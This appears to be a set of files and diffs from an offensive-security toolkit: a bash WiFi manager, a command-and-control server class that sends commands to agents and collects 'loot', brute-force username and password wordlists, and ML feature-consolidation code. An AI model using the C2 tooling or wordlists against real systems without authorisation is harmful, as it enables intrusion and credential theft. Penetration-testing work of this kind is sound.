log "INFO" "Connecting to '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" password "$password" name "$ssid_selected"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid_selected'."
else
log "ERROR" "Failed to connect to '$ssid_selected'."
fi
else
log "INFO" "Operation cancelled."
fi
echo ""
read -r -p "Press Enter to continue..."
fi
done
}
# ============================================================
# Function to Show Current WiFi Status
# ============================================================
show_wifi_status() {
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Current WiFi Status ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
# Check if WiFi is enabled
wifi_enabled=$(nmcli radio wifi)
echo -e "▶ WiFi Enabled : ${wifi_enabled}"
# Show active connection
# Use the connection NAME field instead of SSID
active_conn=$(nmcli -t -f ACTIVE,NAME connection show --active | grep '^yes' | cut -d':' -f2)
if [ -n "$active_conn" ]; then
echo -e "▶ Connected to : ${GREEN}$active_conn${NC}"
else
echo -e "▶ Connected to : ${RED}Not Connected${NC}"
fi
# Show all saved connections
echo -e "\n${CYAN}Saved WiFi Connections:${NC}"
nmcli connection show | grep wifi
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Add a New WiFi Connection
# ============================================================
add_wifi_connection() {
echo -e "${CYAN}Add a New WiFi Connection${NC}"
echo -n "Enter SSID (Network Name): "
read -r ssid
echo -n "Enter WiFi Password (leave empty for open network): "
read -r -s password
echo ""
if [ -z "$ssid" ]; then
log "ERROR" "SSID cannot be empty."
sleep 2
return
fi
if [ -n "$password" ]; then
log "INFO" "Adding new WiFi connection for SSID: $ssid"
nmcli device wifi connect "$ssid" password "$password" name "$ssid"
else
log "INFO" "Adding new open WiFi connection for SSID: $ssid"
nmcli device wifi connect "$ssid" name "$ssid"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid'."
else
log "ERROR" "Failed to connect to '$ssid'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Delete a WiFi Connection
# ============================================================
delete_wifi_connection() {
echo -e "${CYAN}Delete a WiFi Connection${NC}"
# Correctly filter connections by type '802-11-wireless'
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
if [ -z "$connections" ]; then
log "WARN" "No WiFi connections available to delete."
echo ""
read -p "Press Enter to return to the menu..."
return
fi
echo -e "${CYAN}Available WiFi Connections:${NC}"
index=1
declare -A CONNECTIONS
while IFS= read -r conn; do
echo -e "$index. $conn"
CONNECTIONS["$index"]="$conn"
index=$((index + 1))
done <<< "$connections"
echo ""
echo -n -e "${GREEN}Enter the number of the connection to delete (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
return
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
return
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
return
fi
conn_name="${CONNECTIONS[$selection]}"
# Backup the connection before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn_name}.nmconnection"
if nmcli connection show "$conn_name" &> /dev/null; then
log "INFO" "Backing up connection '$conn_name'..."
cp "/etc/NetworkManager/system-connections/$conn_name.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection. It might not be a preconfigured connection or backup location is inaccessible."
fi
else
log "WARN" "Connection '$conn_name' does not exist or cannot be backed up."
fi
log "INFO" "Deleting WiFi connection: $conn_name"
nmcli connection delete "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully deleted '$conn_name'."
else
log "ERROR" "Failed to delete '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Clear All Saved WiFi Connections
# ============================================================
clear_all_connections() {
echo -e "${YELLOW}Are you sure you want to delete all saved WiFi connections? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
log "INFO" "Deleting all saved WiFi connections..."
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
for conn in $connections; do
# Backup before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn}.nmconnection"
if nmcli connection show "$conn" &> /dev/null; then
cp "/etc/NetworkManager/system-connections/$conn.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection '$conn'."
fi
fi
nmcli connection delete "$conn"
log "INFO" "Deleted connection: $conn"
done
log "INFO" "All saved WiFi connections have been deleted."
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Manage WiFi Connections
# ============================================================
manage_wifi_connections() {
while true; do
clear
echo -e "${CYAN}Manage WiFi Connections${NC}"
echo -e "1. List WiFi Connections"
echo -e "2. Delete a WiFi Connection"
echo -e "3. Recreate a WiFi Connection from Backup"
echo -e "4. Back to Main Menu"
echo -n -e "${GREEN}Choose an option (1-4): ${NC}"
read choice
case $choice in
1)
# List WiFi connections
clear
echo -e "${CYAN}Saved WiFi Connections:${NC}"
nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}'
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
2)
delete_wifi_connection
;;
3)
# List available backups
backup_dir="$HOME/wifi_connection_backups"
if [ ! -d "$backup_dir" ]; then
log "WARN" "No backup directory found at '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
backups=("$backup_dir"/*.nmconnection)
# An unmatched glob stays literal, so also verify the first entry exists
if [ ${#backups[@]} -eq 0 ] || [ ! -e "${backups[0]}" ]; then
log "WARN" "No backup files found in '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
echo -e "${CYAN}Available WiFi Connection Backups:${NC}"
index=1
declare -A BACKUPS=()
for backup in "${backups[@]}"; do
backup_name=$(basename "$backup" .nmconnection)
echo -e "$index. $backup_name"
BACKUPS["$index"]="$backup_name"
index=$((index + 1))
done
echo ""
echo -n -e "${GREEN}Enter the number of the connection to recreate (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
continue
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
conn_name="${BACKUPS[$selection]}"
backup_file="$backup_dir/${conn_name}.nmconnection"
# Verify that the backup file exists
if [ ! -f "$backup_file" ]; then
log "ERROR" "Backup file '$backup_file' does not exist."
sleep 2
continue
fi
log "INFO" "Recreating connection '$conn_name' from backup..."
cp "$backup_file" "/etc/NetworkManager/system-connections/" 2>/dev/null
if [ $? -ne 0 ]; then
log "ERROR" "Failed to copy backup file to NetworkManager directory. Check permissions."
sleep 2
continue
fi
# Set correct permissions
chmod 600 "/etc/NetworkManager/system-connections/$conn_name.nmconnection"
# Reload NetworkManager connections
nmcli connection reload
# Bring the connection up
nmcli connection up "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated and connected to '$conn_name'."
else
log "ERROR" "Failed to recreate and connect to '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
4)
log "INFO" "Returning to Main Menu."
return
;;
*)
log "ERROR" "Invalid option."
sleep 2
;;
esac
done
}
# ============================================================
# Function to Force Refresh WiFi Connections
# ============================================================
force_refresh_wifi_connections() {
log "INFO" "Refreshing WiFi connections..."
nmcli connection reload
# Identify the WiFi device (e.g., wlan0, wlp2s0)
wifi_device=$(nmcli device status | awk '$2 == "wifi" {print $1}')
if [ -n "$wifi_device" ]; then
nmcli device disconnect "$wifi_device"
nmcli device connect "$wifi_device"
log "INFO" "WiFi connections have been refreshed."
else
log "WARN" "No WiFi device found to refresh."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Wifi Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. List Available WiFi Networks ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Show Current WiFi Status ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. Add a New WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Delete a WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Clear All Saved WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 6. Manage WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 7. Force Refresh WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 8. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure your WiFi adapter is enabled."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-8): ${NC}"
read choice
case $choice in
1)
list_wifi_and_connect
;;
2)
show_wifi_status
;;
3)
add_wifi_connection
;;
4)
delete_wifi_connection
;;
5)
clear_all_connections
;;
6)
manage_wifi_connections
;;
7)
force_refresh_wifi_connections
;;
8)
log "INFO" "Exiting Wifi Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-8."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts "hfclsadm" opt; do
case $opt in
h)
show_usage
;;
f)
force_refresh_wifi_connections
exit 0
;;
c)
clear_all_connections
exit 0
;;
l)
list_wifi_and_connect
exit 0
;;
s)
show_wifi_status
exit 0
;;
a)
add_wifi_connection
exit 0
;;
d)
delete_wifi_connection
exit 0
;;
m)
manage_wifi_connections
exit 0
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
# ============================================================
# Check Prerequisites Before Starting
# ============================================================
check_prerequisites
# ============================================================
# Handle preconfigured.nmconnection if Exists
# ============================================================
handle_preconfigured_connection
# ============================================================
# Start the Main Menu
# ============================================================
display_main_menu

View File

@@ -612,6 +612,7 @@ class C2Manager:
self._server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._server_socket.bind((self.bind_ip, self.bind_port))
self._server_socket.listen(128)
self._server_socket.settimeout(1.0)
# Start accept thread
self._running = True
@@ -631,6 +632,12 @@ class C2Manager:
except Exception as e:
self.logger.error(f"Failed to start C2 server: {e}")
if self._server_socket:
try:
self._server_socket.close()
except Exception:
pass
self._server_socket = None
self._running = False
return {"status": "error", "message": str(e)}
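The 1.0-second `settimeout` set on the listening socket pairs with the `socket.timeout: continue` handler in the accept loop, so the accept thread wakes up periodically to re-check its running flag instead of blocking in `accept()` forever. A self-contained sketch of that pattern (names such as `run_accept_loop` are illustrative, not from this codebase):

```python
import socket
import threading

def run_accept_loop(server_sock: socket.socket, running: threading.Event, handle):
    """Accept clients until `running` is cleared; the 1s timeout bounds shutdown latency."""
    server_sock.settimeout(1.0)
    while running.is_set():
        try:
            conn, addr = server_sock.accept()
        except socket.timeout:
            continue  # periodic wake-up: re-check the running flag
        except OSError:
            break     # listening socket was closed underneath us
        threading.Thread(target=handle, args=(conn, addr), daemon=True).start()
```

Without the timeout, `stop()` would have to close the socket out from under a blocked `accept()` and rely solely on the `OSError` path to unwind the thread.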
@@ -647,6 +654,12 @@ class C2Manager:
self._server_socket.close()
self._server_socket = None
if self._server_thread and self._server_thread.is_alive():
self._server_thread.join(timeout=3.0)
if self._server_thread.is_alive():
self.logger.warning("C2 accept thread did not exit cleanly")
self._server_thread = None
# Disconnect all clients
with self._lock:
for client_id in list(self._clients.keys()):
@@ -774,7 +787,7 @@ class C2Manager:
for row in rows:
agent_id = row["id"]
# Convert last_seen to a millisecond timestamp
last_seen_raw = row.get("last_seen")
last_seen_epoch = None
if last_seen_raw:
@@ -803,7 +816,7 @@ class C2Manager:
"tags": []
}
# If connected in memory, prefer live telemetry values.
if agent_id in self._clients:
info = self._clients[agent_id]["info"]
agent_info.update({
@@ -816,10 +829,10 @@ class C2Manager:
"disk": info.get("disk_percent", 0),
"ip": info.get("ip_address", agent_info["ip"]),
"uptime": info.get("uptime", 0),
"last_seen": int(datetime.utcnow().timestamp() * 1000),  # in ms
})
# Mark stale clients as offline.
if agent_info["last_seen"]:
delta = (now.timestamp() * 1000) - agent_info["last_seen"]
if delta > OFFLINE_THRESHOLD * 1000:
@@ -827,33 +840,30 @@ class C2Manager:
agents.append(agent_info)
# Deduplicate by hostname (or id fallback): keep the most recent entry
# and prefer an online status over offline.
dedup = {}
for a in agents:
    key = (a.get("hostname") or a["id"]).strip().lower()
    prev = dedup.get(key)
    if not prev:
        dedup[key] = a
        continue

    def rank(status):  # online < idle < offline
        return {"online": 0, "idle": 1, "offline": 2}.get(status, 3)

    better = False
    if rank(a["status"]) < rank(prev["status"]):
        better = True
    else:
        la = a.get("last_seen") or 0
        lp = prev.get("last_seen") or 0
        if la > lp:
            better = True
    if better:
        dedup[key] = a
return list(dedup.values())
def send_command(self, targets: List[str], command: str) -> dict:
"""Send command to specific agents"""
@@ -1060,6 +1070,8 @@ class C2Manager:
args=(sock, addr),
daemon=True
).start()
except socket.timeout:
continue
except OSError:
break # Server socket closed
except Exception as e:
@@ -1159,10 +1171,19 @@ class C2Manager:
def _receive_from_client(self, sock: socket.socket, cipher: Fernet) -> Optional[dict]:
try:
# OPTIMIZATION: Set timeout to prevent threads hanging forever
sock.settimeout(15.0)
header = sock.recv(4)
if not header or len(header) != 4:
return None
length = struct.unpack(">I", header)[0]
# Memory protection: prevent massive data payloads
if length > 10 * 1024 * 1024:
self.logger.warning(f"Rejecting oversized message: {length} bytes")
return None
data = b""
while len(data) < length:
chunk = sock.recv(min(4096, length - len(data)))
@@ -1172,13 +1193,11 @@ class C2Manager:
decrypted = cipher.decrypt(data)
return json.loads(decrypted.decode())
except (OSError, ConnectionResetError, BrokenPipeError):
# socket closed/aborted -> None means a clean disconnect
return None
except Exception as e:
self.logger.error(f"Receive error: {e}")
return None
def _send_to_client(self, client_id: str, command: str):
with self._lock:
client = self._clients.get(client_id)
@@ -1191,8 +1210,6 @@ class C2Manager:
header = struct.pack(">I", len(encrypted))
sock.sendall(header + encrypted)
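`_send_to_client` above and `_receive_from_client` speak the same wire format: a 4-byte big-endian length header followed by a Fernet-encrypted JSON payload, with the receiver rejecting anything over 10 MiB. Setting encryption aside, the framing itself can be sketched with hypothetical helpers:

```python
import struct

MAX_MESSAGE = 10 * 1024 * 1024  # must match the receiver's cap

def frame(payload: bytes) -> bytes:
    """Prefix an (already encrypted) payload with its 4-byte big-endian length."""
    if len(payload) > MAX_MESSAGE:
        raise ValueError(f"message too large: {len(payload)} bytes")
    return struct.pack(">I", len(payload)) + payload

def read_frame(buf: bytes) -> bytes:
    """Inverse of frame(): validate the header and return the payload."""
    (length,) = struct.unpack(">I", buf[:4])
    if length > MAX_MESSAGE or length != len(buf) - 4:
        raise ValueError("corrupt frame")
    return buf[4:]
```

The explicit length prefix is what allows the receive loop to pull exactly `length` bytes in 4 KiB chunks off a stream socket.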
def _process_client_message(self, client_id: str, data: dict):
with self._lock:
if client_id not in self._clients:
@@ -1212,16 +1229,17 @@ class C2Manager:
elif 'telemetry' in data:
telemetry = data['telemetry']
with self._lock:
# OPTIMIZATION: Prune telemetry fields kept in-memory
client_info.update({
    'hostname': str(telemetry.get('hostname', ''))[:64],
    'platform': str(telemetry.get('platform', ''))[:32],
    'os': str(telemetry.get('os', ''))[:32],
    'os_version': str(telemetry.get('os_version', ''))[:64],
    'architecture': str(telemetry.get('architecture', ''))[:16],
    'cpu_percent': float(telemetry.get('cpu_percent', 0)),
    'mem_percent': float(telemetry.get('mem_percent', 0)),
    'disk_percent': float(telemetry.get('disk_percent', 0)),
    'uptime': float(telemetry.get('uptime', 0))
})
self.db.save_telemetry(client_id, telemetry)
self.bus.emit({"type": "telemetry", "id": client_id, **telemetry})
@@ -1230,7 +1248,6 @@ class C2Manager:
self._handle_loot(client_id, data['download'])
elif 'result' in data:
result = data['result']
# Record the result against the actual command that was sent
self.db.save_command(client_id, last_cmd or '<unknown>', result, True)
self.bus.emit({"type": "console", "target": client_id, "text": str(result), "kind": "RX"})
@@ -1329,3 +1346,6 @@ class C2Manager:
# ========== Global Instance ==========
c2_manager = C2Manager()

View File

@@ -280,19 +280,23 @@ class CommentAI:
if not rows:
return None
# Weighted selection using random.choices (no temporary list expansion)
texts: List[str] = []
weights: List[int] = []
for row in rows:
    text = _row_get(row, "text", "")
    if not text:
        continue
    try:
        w = int(_row_get(row, "weight", 1)) or 1
    except Exception:
        w = 1
    texts.append(text)
    weights.append(max(1, w))
if texts:
    chosen = random.choices(texts, weights=weights, k=1)[0]
else:
    chosen = _row_get(rows[0], "text", None)
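The change above relies on `random.choices`, which applies the `weights` sequence directly instead of materialising one list entry per weight unit the way `pool.extend([text] * w)` did. A quick illustration:

```python
import random

texts = ["rare", "common"]
weights = [1, 9]  # "common" should be drawn about 90% of the time

random.seed(0)  # deterministic for the example
sample = random.choices(texts, weights=weights, k=1000)
print(sample.count("common") / len(sample))  # close to 0.9
```

For a weight of 1000 the old approach would have appended 1000 copies of the same string to the pool; here memory stays proportional to the number of distinct rows.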
# Templates {var}
if chosen and params:
@@ -315,6 +319,9 @@ class CommentAI:
"""
Return a comment if status changed or delay expired.
When llm_comments_enabled=True in config, tries LLM first;
falls back to the database/template system on any failure.
Args:
status: logical status name (e.g., "IDLE", "SSHBruteforce", "NetworkScanner").
lang: language override (e.g., "fr"); if None, auto priority is used.
@@ -327,14 +334,36 @@ class CommentAI:
status = status or "IDLE"
status_changed = (status != self.last_status)
if not status_changed and (current_time - self.last_comment_time < self.comment_delay):
    return None
# --- Try LLM if enabled ---
text: Optional[str] = None
llm_generated = False
if getattr(self.shared_data, "llm_comments_enabled", False):
    try:
        from llm_bridge import LLMBridge
        text = LLMBridge().generate_comment(status, params)
        if text:
            llm_generated = True
    except Exception as e:
        logger.debug(f"LLM comment failed, using fallback: {e}")
# --- Fallback: database / template system (original behaviour) ---
if not text:
    text = self._pick_text(status, lang, params)
if text:
    self.last_status = status
    self.last_comment_time = current_time
    self.comment_delay = self._new_delay()
    logger.debug(f"Next comment delay: {self.comment_delay}s")
    # Log comments
    if llm_generated:
        logger.info(f"[LLM_COMMENT] ({status}) {text}")
    else:
        logger.info(f"[COMMENT] ({status}) {text}")
    return text
return None

View File

@@ -1,7 +1,16 @@
root
admin
bjorn
MqUG09FmPb
OD1THT4mKMnlt2M$
letmein
QZKOJDBEJf
ZrXqzIlZk3
9XP5jT3gwJjmvULK
password
toor
1234
123456
9Pbc8RjB5s
fcQRQUxnZl
Jzp0G7kolyloIk7g
DyMuqqfGYj
G8tCoDFNIM
8gv1j!vubL20xCH$
i5z1nlF3Uf
zkg3ojoCoKAHaPo%
oWcK1Zmkve


@@ -1,3 +1,8 @@
manager
root
admin
bjorn
db_audit
dev
user
boss
deploy

data_consolidator.py (new file, 913 lines)

@@ -0,0 +1,913 @@
"""
data_consolidator.py - Data Consolidation Engine for Deep Learning
═══════════════════════════════════════════════════════════════════════════
Purpose:
Consolidate logged features into training-ready datasets.
Prepare data exports for deep learning on external PC.
Features:
- Aggregate features across time windows
- Compute statistical features
- Create feature vectors for neural networks
- Export in formats ready for TensorFlow/PyTorch
- Incremental consolidation (low memory footprint)
Author: Bjorn Team
Version: 2.0.0
"""
import json
import csv
import time
import gzip
import heapq
from datetime import datetime, timedelta
from typing import Dict, List, Any, Optional, Tuple
from pathlib import Path
from logger import Logger
logger = Logger(name="data_consolidator.py", level=20)
try:
import requests
except ImportError:
requests = None
class DataConsolidator:
"""
Consolidates raw feature logs into training datasets.
Optimized for Raspberry Pi Zero - processes in batches.
"""
def __init__(self, shared_data, export_dir: str = None):
"""
Initialize data consolidator
Args:
shared_data: SharedData instance
export_dir: Directory for export files
"""
self.shared_data = shared_data
self.db = shared_data.db
if export_dir is None:
# Default to shared_data path (cross-platform)
self.export_dir = Path(getattr(shared_data, 'ml_exports_dir', Path(shared_data.data_dir) / "ml_exports"))
else:
self.export_dir = Path(export_dir)
self.export_dir.mkdir(parents=True, exist_ok=True)
# Server health state consumed by orchestrator fallback logic.
self.last_server_attempted = False
self.last_server_contact_ok = None
self._upload_backoff_until = 0.0
self._upload_backoff_current_s = 0.0
# AI-01: Feature variance tracking for dimensionality reduction
self._feature_variance_min = float(
getattr(shared_data, 'ai_feature_selection_min_variance', 0.001)
)
# Accumulator: {feature_name: [sum, sum_of_squares, count]}
self._feature_stats = {}
logger.info(f"DataConsolidator initialized, exports: {self.export_dir}")
def _set_server_contact_state(self, attempted: bool, ok: Optional[bool]) -> None:
self.last_server_attempted = bool(attempted)
self.last_server_contact_ok = ok if attempted else None
def _apply_upload_backoff(self, base_backoff_s: int, max_backoff_s: int = 3600) -> int:
"""
Exponential upload retry backoff:
base -> base*2 -> base*4 ... capped at max_backoff_s.
Returns the delay (seconds) applied for the next retry window.
"""
base = max(10, int(base_backoff_s))
cap = max(base, int(max_backoff_s))
prev = float(getattr(self, "_upload_backoff_current_s", 0.0) or 0.0)
if prev <= 0:
delay = base
else:
delay = min(cap, max(base, int(prev * 2)))
self._upload_backoff_current_s = float(delay)
self._upload_backoff_until = time.monotonic() + delay
return int(delay)
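The helper above doubles the delay on each consecutive failure and clamps it to an hour. A standalone sketch of the same progression (the function name `next_backoff` is illustrative, not part of the module):

```python
def next_backoff(prev: float, base: int = 120, cap: int = 3600) -> int:
    """Double the previous delay, clamped to [base, cap]."""
    base = max(10, int(base))
    cap = max(base, int(cap))
    if prev <= 0:
        return base
    return min(cap, max(base, int(prev * 2)))

delays = []
d = 0.0
for _ in range(7):
    d = next_backoff(d)
    delays.append(d)
print(delays)  # [120, 240, 480, 960, 1920, 3600, 3600]
```

With the default 120s base, a server outage backs off to the hourly cap after five failed attempts and stays there.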
# ═══════════════════════════════════════════════════════════════════════
# CONSOLIDATION ENGINE
# ═══════════════════════════════════════════════════════════════════════
def consolidate_features(
self,
batch_size: int = None,
max_batches: Optional[int] = None
) -> Dict[str, int]:
"""
Consolidate raw features into aggregated feature vectors.
Processes unconsolidated records in batches.
"""
if batch_size is None:
batch_size = int(getattr(self.shared_data, "ai_batch_size", 100))
batch_size = max(1, min(int(batch_size), 5000))
stats = {
'records_processed': 0,
'records_aggregated': 0,
'batches_completed': 0,
'errors': 0
}
try:
# Get unconsolidated records
unconsolidated = self.db.query("""
SELECT COUNT(*) as cnt
FROM ml_features
WHERE consolidated=0
""")[0]['cnt']
if unconsolidated == 0:
logger.info("No unconsolidated features to process")
return stats
logger.info(f"Consolidating {unconsolidated} feature records...")
batch_count = 0
while True:
if max_batches and batch_count >= max_batches:
break
# Fetch batch
batch = self.db.query(f"""
SELECT * FROM ml_features
WHERE consolidated=0
ORDER BY timestamp
LIMIT {batch_size}
""")
if not batch:
break
# Process batch
for record in batch:
try:
self._consolidate_single_record(record)
stats['records_processed'] += 1
except Exception as e:
logger.error(f"Error consolidating record {record['id']}: {e}")
stats['errors'] += 1
# Mark as consolidated
record_ids = [r['id'] for r in batch]
placeholders = ','.join('?' * len(record_ids))
self.db.execute(f"""
UPDATE ml_features
SET consolidated=1
WHERE id IN ({placeholders})
""", record_ids)
stats['batches_completed'] += 1
batch_count += 1
# Progress log
if batch_count % 10 == 0:
logger.info(
f"Consolidation progress: {stats['records_processed']} records, "
f"{stats['batches_completed']} batches"
)
logger.success(
f"Consolidation complete: {stats['records_processed']} records processed, "
f"{stats['errors']} errors"
)
except Exception as e:
logger.error(f"Consolidation failed: {e}")
stats['errors'] += 1
return stats
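Each batch is marked consolidated with a parameterized `IN` clause built by repeating `?` once per id, so the ids are bound as parameters rather than interpolated into the SQL string. A minimal sketch of the placeholder construction:

```python
record_ids = [3, 7, 9]
placeholders = ",".join("?" * len(record_ids))
sql = f"UPDATE ml_features SET consolidated=1 WHERE id IN ({placeholders})"
print(sql)  # UPDATE ml_features SET consolidated=1 WHERE id IN (?,?,?)
# db.execute(sql, record_ids)  # ids bound by the driver, never string-formatted
```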
def _consolidate_single_record(self, record: Dict[str, Any]):
"""
Process a single feature record into aggregated form.
Computes statistical features and feature vectors.
"""
try:
# Parse JSON fields once — reused by _build_feature_vector to avoid double-parsing
host_features = json.loads(record.get('host_features', '{}'))
network_features = json.loads(record.get('network_features', '{}'))
temporal_features = json.loads(record.get('temporal_features', '{}'))
action_features = json.loads(record.get('action_features', '{}'))
# Combine all features
all_features = {
**host_features,
**network_features,
**temporal_features,
**action_features
}
# Build numerical feature vector — pass already-parsed dicts to avoid re-parsing
feature_vector = self._build_feature_vector(
host_features, network_features, temporal_features, action_features
)
# AI-01: Track feature variance for dimensionality reduction
self._track_feature_variance(feature_vector)
# Determine time window
raw_ts = record['timestamp']
if isinstance(raw_ts, str):
try:
timestamp = datetime.fromisoformat(raw_ts)
except ValueError:
timestamp = datetime.now()
elif isinstance(raw_ts, datetime):
timestamp = raw_ts
else:
timestamp = datetime.now()
hourly_window = timestamp.replace(minute=0, second=0, microsecond=0).isoformat()
# Update or insert aggregated record
self._update_aggregated_features(
mac_address=record['mac_address'],
time_window='hourly',
timestamp=hourly_window,
action_name=record['action_name'],
success=record['success'],
duration=record['duration_seconds'],
reward=record['reward'],
feature_vector=feature_vector,
all_features=all_features
)
except Exception as e:
logger.error(f"Error consolidating single record: {e}")
raise
def _build_feature_vector(
self,
host_features: Dict[str, Any],
network_features: Dict[str, Any],
temporal_features: Dict[str, Any],
action_features: Dict[str, Any],
) -> Dict[str, float]:
"""
Build a named feature dictionary from already-parsed feature dicts.
Accepts pre-parsed dicts so JSON is never decoded twice per record.
Uses shared ai_utils for consistency.
"""
from ai_utils import extract_neural_features_dict
return extract_neural_features_dict(
host_features=host_features,
network_features=network_features,
temporal_features=temporal_features,
action_features=action_features,
)
def _update_aggregated_features(
self,
mac_address: str,
time_window: str,
timestamp: str,
action_name: str,
success: int,
duration: float,
reward: float,
feature_vector: Dict[str, float],
all_features: Dict[str, Any]
):
"""
Update or insert aggregated feature record.
Accumulates statistics over the time window.
"""
try:
# Check if record exists
existing = self.db.query("""
SELECT * FROM ml_features_aggregated
WHERE mac_address=? AND time_window=? AND computed_at=?
""", (mac_address, time_window, timestamp))
if existing:
# Update existing record
old = existing[0]
new_total = old['total_actions'] + 1
# ... typical stats update ...
# Merge feature vectors (average each named feature)
old_vector = json.loads(old['feature_vector']) # Now a Dict
if isinstance(old_vector, list): # Migration handle
old_vector = {}
merged_vector = {}
# Combine keys from both
all_keys = set(old_vector.keys()) | set(feature_vector.keys())
for k in all_keys:
v_old = old_vector.get(k, 0.0)
v_new = feature_vector.get(k, 0.0)
merged_vector[k] = (v_old * old['total_actions'] + v_new) / new_total
self.db.execute("""
UPDATE ml_features_aggregated
SET total_actions=total_actions+1,
success_rate=(success_rate*total_actions + ?)/(total_actions+1),
avg_duration=(avg_duration*total_actions + ?)/(total_actions+1),
total_reward=total_reward + ?,
feature_vector=?
WHERE mac_address=? AND time_window=? AND computed_at=?
""", (
success,
duration,
reward,
json.dumps(merged_vector),
mac_address,
time_window,
timestamp
))
else:
# Insert new record
self.db.execute("""
INSERT INTO ml_features_aggregated (
mac_address, time_window, computed_at,
total_actions, success_rate, avg_duration, total_reward,
feature_vector
) VALUES (?, ?, ?, 1, ?, ?, ?, ?)
""", (
mac_address,
time_window,
timestamp,
float(success),
duration,
reward,
json.dumps(feature_vector)
))
except Exception as e:
logger.error(f"Error updating aggregated features: {e}")
raise
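The update path folds each new observation into the stored averages without re-reading history: for a window that has already seen `n` actions, the new mean is `(old_mean * n + x) / (n + 1)` — the same rule applied to `success_rate`, `avg_duration`, and each merged feature-vector entry. A small sketch of that rule:

```python
def fold_mean(old_mean: float, n_old: int, x: float) -> float:
    """Incremental mean: equivalent to averaging all n_old + 1 values at once."""
    return (old_mean * n_old + x) / (n_old + 1)

mean, n = 0.0, 0
for x in [1.0, 2.0, 3.0]:
    mean = fold_mean(mean, n, x)
    n += 1
print(mean)  # 2.0
```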
# ═══════════════════════════════════════════════════════════════════════
# AI-01: FEATURE VARIANCE TRACKING & SELECTION
# ═══════════════════════════════════════════════════════════════════════
def _track_feature_variance(self, feature_vector: Dict[str, float]):
"""
Update running statistics (mean, variance) for each feature.
Accumulates running sum / sum-of-squares / count per feature.
"""
for name, value in feature_vector.items():
try:
val = float(value)
except (TypeError, ValueError):
continue
if name not in self._feature_stats:
self._feature_stats[name] = [0.0, 0.0, 0]
stats = self._feature_stats[name]
stats[0] += val # sum
stats[1] += val * val # sum of squares
stats[2] += 1 # count
def _get_feature_variances(self) -> Dict[str, float]:
"""Return computed variance for each tracked feature."""
variances = {}
for name, (s, sq, n) in self._feature_stats.items():
if n < 2:
variances[name] = 0.0
else:
mean = s / n
variances[name] = max(0.0, sq / n - mean * mean)
return variances
def _get_selected_features(self) -> List[str]:
